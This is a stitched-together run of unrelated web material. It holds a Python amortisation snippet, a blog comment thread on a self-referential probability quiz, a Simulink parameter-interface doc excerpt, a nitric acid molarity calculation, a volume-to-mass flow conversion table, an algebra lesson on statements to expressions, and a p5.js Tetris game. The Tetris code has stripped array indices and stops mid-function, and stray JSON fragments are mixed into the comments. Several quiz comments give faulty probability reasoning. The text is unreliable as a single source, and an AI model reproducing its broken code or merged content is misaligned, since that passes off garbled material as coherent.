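    def present_value(rate):
        return sum(cf / (1 + rate) ** t for t, cf in enumerate(cash_flows, start=1))
    while hi - lo > tol:
        mid = (lo + hi) / 2
        if present_value(mid) > carrying_amount:
            lo = mid  # present value too high -> the rate must be higher
        else:
            hi = mid
    return (lo + hi) / 2

def amortisation_table(opening, rate, coupon, years):
    """Yearly rows of (year, opening, interest, closing), rounded to whole CU."""
    rows = []
    for year in range(1, years + 1):
        interest = opening * rate
        closing = opening + interest - coupon
        rows.append((year, round(opening), round(interest), round(closing)))
        opening = closing
    return rows

eir = effective_interest_rate(882, [100, 100, 1100])
table = amortisation_table(882, eir, 100, 3)
# eir -> approximately 0.1518 (15.18%)
# table -> [(1, 882, 134, 916), (2, 916, 139, 955), (3, 955, 145, 1000)]
```

By construction, the closing balance at the end of year 3 equals CU 1,000, the principal repayable if the holder does not convert.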
http://beust.com/weblog/2011/10/27/probability-quiz/
## Probability quiz

• #1 by Danil on October 27, 2011 - 2:05 pm

HHH = A
HHT = B
HTH = B
HTT = C
THH = B
THT = B
TTH = B
TTT = D
25%
"It's all in the wrist."

• #2 by Danil on October 27, 2011 - 2:06 pm

'cept that I threw in some Bs that should be Cs 🙁

• #3 by Cedric on October 27, 2011 - 2:06 pm

Wrong 🙂

• #4 by Cedric on October 27, 2011 - 2:06 pm

Still wrong 🙂

• #5 by tjsnell on October 27, 2011 - 2:16 pm

You should switch doors.

• #6 by HimJim on October 27, 2011 - 2:24 pm

0

• #7 by Cerdeira on October 27, 2011 - 2:40 pm

Because the probability is 25% but because you have 2 25% in 4 possible 😀 2/4 = half so 50% 😀
My brain is hurting me 😉
Cheers,
João Cerdeira

• #8 by Daniel Spiewak on October 27, 2011 - 3:06 pm

Here's the trick: the answer 25% appears twice, thus it cannot be correct since, if it were, the correct answer would be 50% instead of 25%. Unfortunately, 50% is also incorrect, since it only appears once, and thus the probability of selecting *that* answer at random is 25%, not 50%. By a similar argument, we can eliminate 60%. Thus, there is no correct answer to this question.
In other news: this is awesome.

• #9 by Cedric on October 27, 2011 - 3:11 pm

• #10 by Uncle Bob on October 27, 2011 - 3:14 pm

A question that appeared on a chemistry exam:
"Write a question suitable for a chemistry exam and then answer it."

• #11 by Pedro Furlanetto on October 27, 2011 - 3:21 pm

I got the same conclusion you did but at the G+

• #12 by Pedro Furlanetto on October 27, 2011 - 3:59 pm

I meant "Daniel, I got the same conclusion you did but at the G+"

• #13 by Michael Chermside on October 27, 2011 - 4:10 pm

Like Daniel said, except that the answer is 0 percent. The question never stated that the answer must be A, B, C, or D. And I am assuming that "choose an answer at random" means to choose from amongst A, B, C, and D with uniform likelihood.

• #14 by Runar on October 27, 2011 - 4:21 pm

The question has a type error, and the answer is bottom. It's an infinite regression that alternates between 25% and 50% but never converges.
I'm sorry, but paradoxes are not profound. Bottoms lead to nontermination, not enlightenment.

• #15 by Cedric on October 27, 2011 - 4:26 pm

Runar: wow, you must be fun at parties 🙂
Anyway, your answer is wrong. There is a correct answer and it's one of the four listed. No tricks.
Having said this, you are touching on something interesting with your "type error" observation, which I'll cover in my answer.

• #16 by Daniel Spiewak on October 27, 2011 - 4:28 pm

So, there's something a little interesting about the fact that we're choosing an answer uniformly at random. Thus, we have a 50% chance of selecting 25%, and a 25% chance of selecting 50%. This, I believe, is the key to the answer…
0.25 * 0.5 = 0.125
0.5 * 0.25 = 0.125
0.125 + 0.125 = 0.25
Thus, the correct answer is 25%, which is to say, both A and D.

• #17 by rdm on October 27, 2011 - 5:23 pm

If "choose an answer to this question at random" means pick one option from {A,B,C,D}, then 50% of the answers will be 25%, 25% of the answers will be 50%, and 25% of the answers will be 60%. If it means pick a distinct value from the set {25%, 50%, 60%}, then the answers would be 1/3 each. Since a 1/3 probability has nothing to do with the available answers, let's ignore that.
That leaves the question of "correctness". A question here is whether there is a single correct value or whether there is a series of correct values. But let's assume that there is a single correct value. That single correct value depends on what "correctness" means. One possibility is that correctness corresponds to the numerical values listed, but this concept leads to contradictions. Another possibility is that there is one correct answer, that that answer is either A, B, C or D, and that we do not know what that answer is.
If this latter definition of correctness is being used (and it's sadly representative of educational testing), then the answer is obvious.

• #18 by Rik on October 27, 2011 - 8:35 pm

It depends on the answer. If the answer is 25%, it is 50%. Otherwise 25%.

• #19 by Micharl on October 27, 2011 - 10:08 pm

• #20 by Patrick Gras on October 27, 2011 - 11:27 pm

There is 0% chance I will be correct, because I may choose:
25% with 50% of chances
50% with 25% of chances
60% with 25% of chances
but I have no chance to choose X% with X% chances…

• #21 by Dominique Gallot on October 27, 2011 - 11:31 pm

If you carefully read the question, you will understand that there are no correct answers. "If YOU": the number of answers is 1, so your result can only be wrong or correct. Therefore the only valid responses are 0% or 100%, which anyway are not in the list.

• #22 by Maarten on October 27, 2011 - 11:56 pm

e. 20%

• #23 by Raphaël Jolly on October 28, 2011 - 12:14 am

The question doesn't imply that the answer is in the list. So, 0%

• #24 by fischi on October 28, 2011 - 12:35 am

Dominique, I think you are on the right track.
No one said you had to choose an answer from the given (4) choices, so there are two theories:
* it is an open question, so the possibility of random answers is infinite, therefore the probability of getting it right is nearly 0%. As 0% is not listed, I assume the question to be yes or no.
* in this case, randomly chosen, you get the 50% probability.
The answer (if you follow this type of thinking) would be B, 50%.
Cedric will tell us if I got it right. If it is purely mathematical AND you have to choose from the FOUR answers given, I will have to reconsider 😉

• #25 by Denis on October 28, 2011 - 1:01 am

50%, because the probability of 25% is 2/4 = 0.5 = 50%. There is no such thing as "depends" because only 25% is the correct answer.

• #26 by Dennis Lenaerts on October 28, 2011 - 1:45 am

By "choosing an answer at random", you do mean the set of possible answers is {A,B,C,D}, and the probabilities are uniformly distributed across all four answers, right?
If not, you could just choose within {A,B} with 1/2 probability for each answer, and B would be correct.

• #27 by Kevin Wright on October 28, 2011 - 2:20 am

I say it's a bit of a trick question. It doesn't state that your answer absolutely must be one of those listed.
There's a 25% chance that you'll pick 50%, a 25% chance that you'll pick 60%, and a 50% chance that you'll pick 25%.
Therefore, the chance that you'll be correct by randomly choosing one of the listed answers is 0%.

• #28 by Michael on October 28, 2011 - 2:47 am

If you choose your answer by logic and reason, then your pick is not random any more.
The criterion to decide if an answer is correct is to assert that you have picked truly randomly. So, when you try to pick randomly and I make assertions on each pick (guessing), how often would I assert right?
I would flip a coin.

• #29 by Manu on October 28, 2011 - 3:22 am

The probability that it's not 25% is 50%, for 50% it's 25% and for 60% it's also 25%, hence:
0.25 * 0.5 = 0.125
0.5 * 0.25 = 0.125
0.6 * 0.25 = 0.15
This adds up to a probability of 40% that it's none of the answers, so the probability should be 1 − 0.4, which leaves us with 60%.

• #30 by fla on October 28, 2011 - 7:24 am

One random answer? It could be anything. So my guess is that I have 1/infinity to find the correct answer 🙂

• #31 by adam on October 28, 2011 - 8:30 am

• #32 by John O'Brien on October 28, 2011 - 9:01 am

Suppose we take a different problem as our starting point. Assume that we have two options, option A and option B, and that the correct answer is option A 10% of the time and option B 90% of the time. If we choose either option randomly, with an equal chance of choosing either option, what are the chances we choose the correct option?
To answer this, we need to figure out the chances that the correct answer will be option A and we will choose option A, or that the correct answer will be option B and we will choose option B. So:

| Option | Chance it is correct | Chance we choose this option | Percentage of the time we choose correctly |
| A | 10% | 50% | 5% |
| B | 90% | 50% | 45% |

So, for option A, it is the correct answer and we choose it 10% * 50% of the time = 5% of the time. For option B, we choose it and it is the correct answer 90% * 50% = 45% of the time. Adding them together, 5% + 45% = 50% of the time we choose the correct answer if we choose randomly.
Now let's notice something interesting about this problem. Since the chance that option A is correct plus the chance that option B is correct sums to 100% (10% + 90% = 100%), we don't actually need to know the chance that option A is correct or the chance that option B is correct. Indeed, since they sum to 100%, and the chance that we choose either one is 50%/50%, any combination of the chance that A is correct or that B is correct will yield the same percentage of the time we choose the correct answer (that is, 50%). This will be true so long as the chance that we choose either option is evenly split, and the chances that all options are correct sum to 100%.
Now, if we add four options and do the same calculation, we get a 25% chance that we choose the right answer:

| Option | Chance it is correct | Chance we choose this option | Percentage of the time we choose correctly |
| A | 25% | 25% | 6.25% |
| B | 25% | 25% | 6.25% |
| C | 25% | 25% | 6.25% |
| D | 25% | 25% | 6.25% |

6.25% + 6.25% + 6.25% + 6.25% = 25%
But, hang on, you say: if that is the case, then the correct answer is both A and D. Okay, I say. So let's articulate that as another table, where choosing option A is correct 100% of the time and choosing option D is correct 100% of the time. Now we end up in a very different circumstance than in the first case, when we just had options A and B. Since two options are correct, the summed chance of any option being correct is 200%, not 100%.

| Option | Chance it is correct | Chance we choose this option | Percentage of the time we choose correctly |
| A | 100% | 25% | 25% |
| B | 0% | 25% | 0% |
| C | 0% | 25% | 0% |
| D | 100% | 25% | 25% |

Total: 50.00%
Which would make the *real* correct answer 50%. Does that mean that the real correct answer is to say that 50% is correct 100% of the time? Let's articulate that as another table, where choosing option B is correct 100% of the time.

| Option | Chance it is correct | Chance we choose this option | Percentage of the time we choose correctly |
| A | 0% | 25% | 0% |
| B | 100% | 25% | 25% |
| C | 0% | 25% | 0% |
| D | 0% | 25% | 0% |

Total: 25%
So it appears we have a paradox. If the correct answer is 25%, then we will choose that answer 50% of the time.
If the answer is 50%, then we will choose that answer 25% of the time.\nOf course, part of the problem is the phrasing “if you choose to answer this question at random,” which is imprecise. I have taken it to mean if you chooose one of the four options randomly, with\nan equaly chance of choosing any of the four options.\nIf instead (as other commenters have noted) you take the whole answer set as the options to choose among (so the correct answers to choose are either 25%, 50%, or 60%), then the problem does have a\nsolution, but it is not one of the solutions listed.\nChance it is this option Chance we Chose this Option Percentage of the Time we Chose Correctly\nA 33% 33% one ninth\nB 33% 33% one ninth\nC 33% 33% one ninth\n33%\nWhat if, instead, we presume that “correctness” is intepreted not as the dereferenced value of the answer (where the answer is 25%), but instead as a specific answer (say, either option A or D).\nIf that is the case, there there are two circumstances. A has 100% chance of being right, and D has 0% chance. Or D has 100% chance of being right, and A has 0% chance.\nChance it is this option Chance we Chose this Option Percentage of the Time we Chose Correctly\nA 100% 25% 25%\nB 0% 25% 0%\nC 0% 25% 0%\nD 0% 25% 0%\n25%\nChance it is this option Chance we Chose this Option Percentage of the Time we Chose Correctly\nA 0% 25% 0%\nB 0% 25% 0%\nC 0% 25% 0%\nD 25% 25% 25%\n25%\nEither way, 25% is still the right answer, if you define “correctness” as being possible to be applied to just A or D. This circumstance is possible in a computer system (imagine a system that blindly takes just A as the right answer, ignoring the fact that D has the same value), but may be harder to imagine with a human grader.\n\n• #33 by Rochester on October 28, 2011 - 9:41 am", null, "Right answer: What a waste of time!\n\n• #34 by dave on October 28, 2011 - 10:01 am", null, "C.\nWhen guessing at multiple choice questions, people choose C 60% of the time. 
I’m totally making that up, but it sounds good 😀\n\n• #35 by Marcel on October 28, 2011 - 10:39 am", null, "One solution:\nFirst we should know the question to the optional answers. If we know the question, we can determine the correct answer. Based on the correct answer we can determine the probability of chosing the correct answer randomly (if the correct answer should be listed as an optional answer at all).\nAs the question itself is unknown, we cannot determine the probability as “this question” cannot refer to the question “, what is…”.\nSecond solution:\nIf “this question” should refer to the question “, what is…”, the result would be:\nAn answer to this ‘question’ cannot be determined. As I cannot see the answer ‘cannot be determined’ under A,B,C or D, the probability is 0%.\n\n• #36 by Leon on October 28, 2011 - 7:59 pm", null, "The tricky part of course is formalizing the problem. “If *you* choose an answer to this question at random” means you are making a sequence of random choices, and then see how frequently the particular probability you pre-selected appears in that sequence. So, for example, there is a chance that you pick option C and see it 60% of the time in a particular random sequence, although that chance is obviously small.\nLet’s consider a set of all possible sequences, and see how many of them will yield the right answer for each selection. After N choices made, we have 4 ^ N sequences (ignore for now that A and D are same, we’ll get to it later), each of them equally probable. How many of those have option B appearing at 50% rate? That’s choose N/2 out of N, or N!/ ((N/2)! ^ 2) multiplied by the number of remaining 3 choices (A, C, and D) in the other N/2 positions, which is 3 ^ (N/2), so we get:\n(N! / ((N/2)! * (N/2)!)) * (3 ^ (N/2)) / 4 ^ N\nFor choice C we get:\n(N! / ((N * 3/5)! * (N * 2/5)!)) * (3 ^ (N * 2/5)) / 4 ^ N\nFinally, for A and D, if they were not the same, we’d get:\n(N! / ((N * 3/4)! * (N/4)!) 
* 3 ^ (N * 3/4)) / 4 ^ N\nBut since A and D are the same, we have 2 ^ (N/4) ways to pick the positions for 0.25% probabilities, and only 2 (instead of 3) for the remaining ones, which is:\n(N! / ((N * 3/4)! * (N/4)!) * 2 ^ (N/4) * 2 ^ (N * 3/4)) / 4 ^ N\nNow, what shall we pick for N? It’s clear that as N is getting larger, probability of getting *any* of the answers *exactly* approaches 0. To understand what’s going on here, think how likely it is to flip a coin 100 times and get heads exactly 50 times. What about getting exactly 500 out of 1000? Although rate of heads will aproach 50%, probability of getting exactly half heads will reduce as number of attempts grows.\nSo let’s try different values for N:\nN = 1 obviously doesn’t work\nN = 2 gives 3/8 for option B, and can’t possibly work with A, C, and D\nN = 3 can’t possibly work\nN = 4 gives 27/128 for B, can’t work for C, and it gives 1/4 for A and D (25%, hooray!)\nWth N > 4 the probabilities go down as expected, for example, with N = 8 we get 7/64 for options A and D. It’s clear that larger values of N can’t possibly work.\nIn other words, out of all 256 (4 ^ 4) possible sequences of 4 choices, 64 have either A or D occuring only once.\nThus we can say that if you make a large number batches of 4 random choices, you’ll find out that a single 25% choice occurs in about 1/4 of them.\n\n• #37 by DR NASH on October 29, 2011 - 9:02 am", null, "• #38 by Satish on October 29, 2011 - 7:46 pm", null, "I consider myself an unlucky person while answering such questions hence the probability of my answer being right will be always on lower side. So I would choose A or D. But since I am not lucky, this might be an wrong answer so the right answer might be B or C. Among B and C, it’s C if i choose B and it’s B if i choose C.\n\n• #39 by Lars Bengtsson on October 30, 2011 - 3:17 am", null, "The chance to choose a correct answer is 50%. 
Because the correct answers are A and D.\nThe question can be divided into two parts.\n1) choose an answer at random\n2) what is the probability the choise is correct.\nAs Cedric said the ANSWER is among a,b,c,d. But there is no restriction that the answer to 2) is the same as the answer to 1).\n\n• #40 by Dave on October 30, 2011 - 1:36 pm", null, "Depends on who grades the answer, since the idea of correctness is clearly subjective:\n– if someone else does, it’s 0%\nSince the problem states I get to choose the answer, then I’m going to pick the right one (42) and there’s a 100% chance I’m right.\nA follow-on question is whether someone could prove an algorithm halts if no meta-coding (self-modifying, reflective, etc.) is disallowed.\n\n• #41 by Markus on October 31, 2011 - 1:11 pm", null, "It’s a bit unclear what ‘this question’ is, sounds like a trick 🙂\nI’d say: one third.\n\n• #42 by Matthew on November 1, 2011 - 7:04 am", null, "1/3\n\n• #43 by relegation on November 1, 2011 - 11:41 pm", null, "E None of the above\n\n• #44 by Phil Mac on November 2, 2011 - 2:00 am", null, "Um..\nChoosing an answer to ‘this’ question at random..\nSo you can only be either ‘right’ or ‘wrong’.\nSo it’s 50%.\nNo?\n\n• #45 by Jouni on November 2, 2011 - 9:52 pm", null, "", null, "" ]
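John O'Brien's tables can be checked numerically. The sketch below (my own illustration, not from the thread) simulates a uniform random pick among options A–D, where A and D both carry the value "25%", and measures how often the pick matches a given "correct" value — reproducing the paradox that deeming "25%" correct yields a 50% hit rate, while deeming "50%" correct yields 25%.

```python
import random

# The four options of the quiz; A and D share the same value.
OPTIONS = {"A": "25%", "B": "50%", "C": "60%", "D": "25%"}

def hit_rate(correct_value, trials=100_000, seed=0):
    """Fraction of uniform random picks whose value equals correct_value."""
    rng = random.Random(seed)
    hits = sum(OPTIONS[rng.choice("ABCD")] == correct_value
               for _ in range(trials))
    return hits / trials

# hit_rate("25%") is close to 0.50, while hit_rate("50%") is close to 0.25:
# whichever value you declare correct, the hit rate contradicts it.
```

This is only a Monte Carlo restatement of the tables above, not a resolution of the paradox.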
https://ch.mathworks.com/help/simulink/ug/design-parameter-interface-for-reusable-components.html
## Parameter Interfaces for Reusable Components

You can use subsystems, referenced models, and custom library blocks as reusable components in other models. For guidelines to help you decide how to componentize a system, see Choose Among Types of Model Components.

Typically, a reusable algorithm requires that numeric block parameters, such as the Gain parameter of a Gain block, either:

• Use the same value in all instances of the component.

• Use a different value in each instance of the component. Each value is instance specific.

By default, if you use a literal number or expression to set the value of a block parameter, the parameter uses the same value in all instances of the component. If you set multiple block parameter values by using a MATLAB® variable, `Simulink.Parameter` object, or other parameter object in a workspace or data dictionary, these parameters also use the same value in all instances of the component.

### Referenced Models

If you use model referencing to create a reusable component, to set parameter values that are specific to each instance, configure model arguments for the referenced model. When you instantiate the model by adding a Model block to a different model, you set the values of the arguments in the Model block. When you add another Model block to the same parent model or to a different model, you can set different values for the same arguments. Optionally, if you create more than two instances, you can set the same value for some of the instances and different values for the other instances.

If a model has many model arguments, consider packaging the arguments into a single structure. Instead of configuring many arguments, configure the structure as a single argument. Without changing the mathematical functionality of the component, this technique helps you to reduce the number of model argument values that you must set in each instance of the component.
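The "package the arguments into a single structure" idea is not Simulink-specific. As a rough analogy (all names here are illustrative, not MATLAB/Simulink API), one frozen parameter struct per component instance keeps the algorithm identical while only the per-instance values differ:

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class GainParams:
    """One structure bundling all instance-specific arguments."""
    gain: float
    offset: float

def reusable_component(x: float, p: GainParams) -> float:
    # Same algorithm in every instance; only the parameter struct differs.
    return p.gain * x + p.offset

# Two "Model block" instances of the same component, each with its own struct:
instance_a = GainParams(gain=2.0, offset=0.0)
instance_b = GainParams(gain=2.0, offset=1.5)
```

Passing one struct instead of many loose arguments mirrors configuring the structure as a single model argument.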
https://www.laboratorynotes.com/molarity-of-70-percent-nitric-acid-hno3/
# Molarity of 70% (w/w) Nitric Acid (HNO3)

• Nitric acid is a clear colorless liquid. A 70% (w/w) concentrated Nitric acid can be obtained from different suppliers.
• 70% (w/w) Nitric acid means that 100 g of Nitric acid contains 70 g of HNO3.
• The density of 70% (w/w) Nitric acid is 1.413 g/ml at 25°C, which means that 1 ml of Nitric acid weighs 1.413 grams at 25°C.
• Molarity refers to the number of moles of the solute present in 1 liter of solution.
• In simple words, 1 mole is equal to the molecular weight of the substance in grams. For example, 1 mole of HNO3 is equal to 63.01 grams of HNO3 (molecular weight = 63.01).

## Calculation procedure:

Step 1: Calculate the volume of 100 grams of Nitric acid.
Formula:
Density = weight / volume, so
Volume = weight / density
Volume of 100 grams of Nitric acid: 100 / 1.413 = 70.771 ml

Note: 70% (w/w) Nitric acid means that 100 g of Nitric acid contains 70 g of HNO3.

The volume of 100 grams of Nitric acid is 70.771 ml. That means 70 grams of HNO3 is present in 70.771 ml of Nitric acid.

Step 2: Calculate how many grams of HNO3 are present in 1000 ml of Nitric acid.
70.771 ml of Nitric acid contain = 70 grams of HNO3
1 ml of Nitric acid will contain = 70 / 70.771 grams of HNO3
1000 ml of Nitric acid will contain = 1000 × 70 / 70.771 = 989.106 grams of HNO3

Step 3: Calculate the number of moles of HNO3 present in 989.106 grams of HNO3.
63.01 grams of HNO3 is equal to 1 mole.
1 gram of HNO3 will be equal to 1/63.01 moles.
989.106 grams will be equal to 989.106 × 1/63.01 = 15.6976 moles
Therefore, 1 liter of Nitric acid contains 15.6976 moles; in other words, the molarity of 70% (w/w) Nitric acid is 15.6976 M (≈ 15.698 M).
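The three steps above collapse into one formula: molarity = 10 × density × mass-% / molecular weight (the factor 10 converts g/ml and percent into g per liter). A small sketch of that shortcut:

```python
def molarity_from_mass_percent(pct_w_w: float,
                               density_g_per_ml: float,
                               mol_weight: float) -> float:
    """Molarity of a solution given its mass percent, density and
    the solute's molecular weight: (10 * density * %) / MW."""
    return 10.0 * density_g_per_ml * pct_w_w / mol_weight

# 70% (w/w) HNO3, density 1.413 g/ml, MW 63.01 g/mol → about 15.70 M,
# matching the step-by-step result above.
m = molarity_from_mass_percent(70, 1.413, 63.01)
```

The same function works for any acid: plug in the supplier's mass percent, density and molecular weight.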
https://www.unitconverters.net/flow/cubic-meter-day-to-pound-hour-gasoline-at-15-5-b0c.htm
# Convert Cubic Meter/day to Pound/hour (Gasoline at 15.5°C)

### Cubic Meter/day to Pound/hour (Gasoline at 15.5°C) Conversion Table

Cubic Meter/day [m^3/d] | Pound/hour (Gasoline at 15.5°C)
0.01 m^3/d | 0.6791423177
0.1 m^3/d | 6.7914231771
1 m^3/d | 67.9142317714
2 m^3/d | 135.8284635428
3 m^3/d | 203.7426953142
5 m^3/d | 339.5711588569
10 m^3/d | 679.1423177139
20 m^3/d | 1358.2846354278
50 m^3/d | 3395.7115885695
100 m^3/d | 6791.4231771389
1000 m^3/d | 67914.231771389

### How to Convert Cubic Meter/day to Pound/hour (Gasoline at 15.5°C)

1 m^3/d = 67.9142317714 pound/hour (Gasoline at 15.5°C)
1 pound/hour (Gasoline at 15.5°C) = 0.0147244543 m^3/d

Example: convert 15 m^3/d to pound/hour (Gasoline at 15.5°C):
15 m^3/d = 15 × 67.9142317714 = 1018.7134765708 pound/hour (Gasoline at 15.5°C)
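Since the table is a single multiplicative factor, the whole conversion is two one-line functions (a sketch using the factor quoted above):

```python
# 1 m^3/d of gasoline at 15.5 °C corresponds to this many lb/h,
# per the conversion table above.
M3_PER_DAY_TO_LB_PER_H = 67.9142317714

def m3_per_day_to_lb_per_h(v: float) -> float:
    """Cubic meters/day → pounds/hour (gasoline at 15.5 °C)."""
    return v * M3_PER_DAY_TO_LB_PER_H

def lb_per_h_to_m3_per_day(v: float) -> float:
    """Pounds/hour (gasoline at 15.5 °C) → cubic meters/day."""
    return v / M3_PER_DAY_TO_LB_PER_H
```

For example, `m3_per_day_to_lb_per_h(15)` reproduces the worked example of 1018.7134765708 lb/h.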
https://www.teachoo.com/8692/2807/Statements-to-expressions/category/Statements-to-expressions/
Statements to expressions

Chapter 11 Class 6 Algebra
Concept wise

Let's learn how to convert a situation into an expression. First we find the variable in our situation, and then make an expression.

| Situation | Variable | Expression |
| --- | --- | --- |
| Sarita has 10 more marbles than Ameena. | Let marbles with Ameena = x | Marbles with Sarita = x + 10 |
| Balu is 3 years younger than Raju. | Let Raju's age = x years | Balu's age = (x − 3) years |
| Bikash is twice as old as Raju. | Let Raju's age = x years | Bikash's age = 2 × x = 2x years |
| Raju's father's age is 2 years more than 3 times Raju's age. | Let Raju's age = x years | Raju's father's age = (3x + 2) years |
| How old will Susan be 5 years from now? | Let Susan's age = y years | Susan's age after 5 years = (y + 5) years |
| How old was Susan 4 years ago? | Let Susan's age = y years | Susan's age 4 years ago = (y − 4) years |
| Price of wheat per kg is 5 rupees less than the price of rice per kg. | Let price of rice per kg = p rupees | Price of wheat per kg = (p − 5) rupees |
| Price of oil per litre is 5 times the price of rice per kg. | Let price of rice per kg = p rupees | Price of oil per litre = 5p rupees |
| The speed of a bus is 10 km/hour more than the speed of a truck going on the same road. | Let speed of truck = y km/hr | Speed of bus = (y + 10) km/hr |
| Ali has twice as many apps as Nandan does. | Let number of apps with Nandan = x | Number of apps with Ali = 2x |
| Rajshri has got 3 more certificates than Kamal. | Let number of certificates with Kamal = x | Number of certificates with Rajshri = x + 3 |
| Anthony has 10 toys less than Kabir. | Let number of toys with Kabir = x | Number of toys with Anthony = x − 10 |
| Sumit's weight is one-third of his grandfather's weight. | Let grandfather's weight = w | Sumit's weight = w/3 |
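Each row of the table maps a statement to an expression in one variable. A few of the rows written as Python functions (my illustration; the names just echo the table):

```python
# x = marbles with Ameena → Sarita has x + 10
sarita_marbles = lambda x: x + 10

# x = Raju's age → Balu is 3 years younger, Bikash is twice as old,
# Raju's father is 2 years more than 3 times Raju's age
balu_age = lambda x: x - 3
bikash_age = lambda x: 2 * x
rajus_father_age = lambda x: 3 * x + 2

# w = grandfather's weight → Sumit weighs one-third of it
sumit_weight = lambda w: w / 3
```

For instance, if Raju is 10, the table and the functions both give Balu's age as 7 and Raju's father's age as 32.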
https://codepen.io/dylangggg/pen/pQJzpz
## HTML

(empty)

## CSS

```css
/* style.css */

html, body {
  height: 100%;
}

body {
  margin: 0;
  display: flex;

  /* This centers our sketch horizontally. */
  justify-content: center;

  /* This centers our sketch vertically. */
  align-items: center;

  background-color: black;
}
```

## JS

```js
var gridSpace = 30;

var fallingPiece;
var gridPieces = [];
var lineFades = [];   // declaration missing from the extracted text; used below
var gridWorkers = [];

var currentScore = 0;
var currentLevel = 1;
var linesCleared = 0;

var ticks = 0;
var updateEvery = 15;
var updateEveryCurrent = 15;
var fallSpeed = gridSpace * 0.5;
var pauseGame = false;
var gameOver = false;

var gameEdgeLeft = 150;
var gameEdgeRight = 450;

var colors = [
  '#ecb5ff',
  '#ffa0ab',
  '#8cffb4',
  '#ff8666',
  '#80c3f5',
  '#c2e77d',
  '#fdf9a1',
];

function setup() {
  createCanvas(600, 540);

  fallingPiece = new playPiece();
  fallingPiece.resetPiece();
  textFont('Trebuchet MS');
}

function draw() {
  var colorDark = "#071820",
      colorLight = "#344c57",
      colorBackground = "#ecf4cb";

  background(colorBackground);

  // Right side info
  fill(25);
  noStroke();
  rect(gameEdgeRight, 0, 150, height);
  // Left side info
  rect(0, 0, gameEdgeLeft, height);

  fill(colorBackground);
  // Score rectangle
  rect(450, 50, 150, 70);
  // Next piece rectangle
  rect(460, 300, 130, 130, 5, 5);
  // Level rectangle
  rect(460, 130, 130, 60, 5, 5);
  // Lines rectangle
  rect(460, 200, 130, 60, 5, 5);

  fill(colorLight);
  // Score lines
  rect(450, 55, 150, 20);
  rect(450, 80, 150, 4);
  rect(450, 110, 150, 4);

  fill(colorBackground);
  // Score banner
  rect(460, 30, 130, 35, 5, 5);

  strokeWeight(3);
  noFill();
  stroke(colorLight);
  // Score banner inner rectangle
  rect(465, 35, 120, 25, 5, 5);

  // Next piece inner rectangle
  stroke(colorLight);
  rect(465, 305, 120, 120, 5, 5);
  // Level inner rectangle
  rect(465, 135, 120, 50, 5, 5);
  // Lines inner rectangle
  rect(465, 205, 120, 50, 5, 5);

  // Draw the info labels
  fill(25);
  noStroke();
  textSize(24);
  textAlign(CENTER);
  text("Score", 525, 55);
  text("Level", 525, 158);
  text("Lines", 525, 228);

  // Draw the actual info
  textSize(24);
  textAlign(RIGHT);

  // The score
  text(currentScore, 560, 105);
  text(currentLevel, 560, 180);
  text(linesCleared, 560, 250);

  stroke(colorDark);
  line(gameEdgeRight, 0, gameEdgeRight, height);

  fallingPiece.show();

  if (keyIsDown(DOWN_ARROW)) {
    updateEvery = 2;
  } else {
    updateEvery = updateEveryCurrent;
  }

  if (!pauseGame) {
    ticks++;
    if (ticks >= updateEvery) {
      ticks = 0;
      fallingPiece.fall(fallSpeed);
    }
  }

  for (let i = 0; i < gridPieces.length; i++) {
    gridPieces[i].show();
  }

  for (let i = 0; i < lineFades.length; i++) {
    lineFades[i].show();   // loop body lost in extraction; show() is the likely call
  }

  if (gridWorkers.length > 0) {
    gridWorkers[0].work();   // index lost in extraction; only the front worker runs
  }

  // Explain the controls
  textAlign(CENTER);
  fill(255);
  noStroke();
  textSize(14);
  text("Controls:\n↑\n← ↓ →\n", 75, 175);
  text("Left and Right:\nmove side to side", 75, 250);
  text("Up:\nrotate", 75, 300);
  text("Down:\nfall faster", 75, 350);

  // Game over text
  if (gameOver) {
    fill(colorDark);
    textSize(64);
    textAlign(CENTER);
    text("Game\nOver!", 300, 270);
  }
}

function lineBar(y, index) {
  this.pos = new p5.Vector(gameEdgeLeft, y);
  this.width = gameEdgeRight - gameEdgeLeft;
  this.index = index;

  this.show = function() {
    fill(255);
    noStroke();
    rect(this.pos.x, this.pos.y, this.width, gridSpace);

    if (this.width + this.pos.x > this.pos.x) {
      this.width -= 10;
      this.pos.x += 5;
    } else {
      // shiftGridDown(this.pos.y, gridSpace);
      gridWorkers.push(new worker(this.pos.y, gridSpace));
    }
  }
}

function keyPressed() {
  if (!pauseGame) {
    if (keyCode === LEFT_ARROW) {
      fallingPiece.input(LEFT_ARROW);
    } else if (keyCode === RIGHT_ARROW) {
      fallingPiece.input(RIGHT_ARROW);
    }
    if (keyCode === UP_ARROW) {
      fallingPiece.input(UP_ARROW);
    }
  }
}

function playPiece() {
  this.pos = new p5.Vector(0, 0);
  this.rotation = 0;
  this.nextPieceType = Math.floor(Math.random() * 7);
  this.nextPieces = [];
  this.pieceType = 0;
  this.pieces = [];
  this.orientation = [];
  this.fallen = false;

  this.nextPiece = function() {
    this.nextPieceType = pseudoRandom(this.pieceType);
    this.nextPieces = [];

    var points = orientPoints(this.nextPieceType, 0);
    var xx = 525, yy = 365;

    if (this.nextPieceType != 0 && this.nextPieceType != 3) {
      xx += (gridSpace * 0.5);
    }

    // Array indices were stripped during extraction; points[i][0]/points[i][1]
    // are the x/y grid offsets of the four squares of the piece.
    for (var i = 0; i < 4; i++) {
      this.nextPieces.push(new square(xx + points[i][0] * gridSpace,
                                      yy + points[i][1] * gridSpace,
                                      this.nextPieceType));
    }
  }

  this.fall = function(amount) {
    if (!this.futureCollision(0, amount, this.rotation)) {
      // The actual move appears to have been lost in extraction;
      // the piece has to descend before being marked as fallen.
      this.pos.y += amount;
      this.updatePoints();
      this.fallen = true;
    } else {
      // WE HIT SOMETHING D:
      if (!this.fallen) {
        // Game over aka pause forever
        pauseGame = true;
        gameOver = true;
      } else {
        this.commitShape();
      }
    }
  }

  this.resetPiece = function() {
    this.rotation = 0;
    this.fallen = false;
    this.pos.x = 330;
    this.pos.y = -60;

    this.pieceType = this.nextPieceType;

    this.nextPiece();
    this.newPoints();
  }

  this.newPoints = function() {
    var points = orientPoints(this.pieceType, this.rotation);
    this.orientation = points;
    this.pieces = [];
    for (var i = 0; i < 4; i++) {
      this.pieces.push(new square(this.pos.x + points[i][0] * gridSpace,
                                  this.pos.y + points[i][1] * gridSpace,
                                  this.pieceType));
    }
  }

  // Whenever the piece gets rotated, this gets the new positions of the squares
  this.updatePoints = function() {
    if (this.pieces) {
      var points = orientPoints(this.pieceType, this.rotation);
      this.orientation = points;
      for (var i = 0; i < 4; i++) {
